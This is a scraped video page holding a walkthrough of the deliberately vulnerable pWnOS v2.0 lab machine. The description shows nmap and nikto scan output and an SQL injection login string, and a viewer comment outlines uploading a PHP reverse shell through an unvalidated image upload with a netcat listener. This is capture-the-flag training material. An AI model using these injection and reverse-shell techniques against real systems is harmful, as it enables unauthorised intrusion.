pWnOS v2.0 walkthrough

preview_player
Показать описание

Description:
The VM will get the 10.10.10.100 IP by default, so let’s set the IP of our kali to 10.10.10.101.
ifconfig eth0 down
ifconfig eth0 10.10.10.101 up

nmap -A 10.10.10.100
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))

nikto --host 10.10.10.100
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...

/login - SQLi
User: abc' OR 1=1 -- -
Use sqlmap:

This one works on ssh.
Рекомендации по теме
Комментарии
Автор

Great job, very explicative. But for begginers who dont know a lot about linux or command line interface, i think there is an easier way to solve it. If you use a program to see the directories in the page, there is one called "blog" which also has an sql injectable login. If you login there, now you can upload "images", except it doesn't validate they are actually jpg or png or whatever, so you can upload the reverse shell (in php because that's the only app running in the site that can interpret one, download it from internet and edit it so it includes YOUR computers ip and the port you will be listening in with netcat or whichever app you prefer) there without using any commands. You then discover there is a directory at [ip]/blog/images/ where you can see the uploaded things, including your reverse shell, you just click it as you are listening with ncat and you will have the initial access, now you just have to scale privileges as done in the video.
Great and valuable content, keep it up!

raulzuniga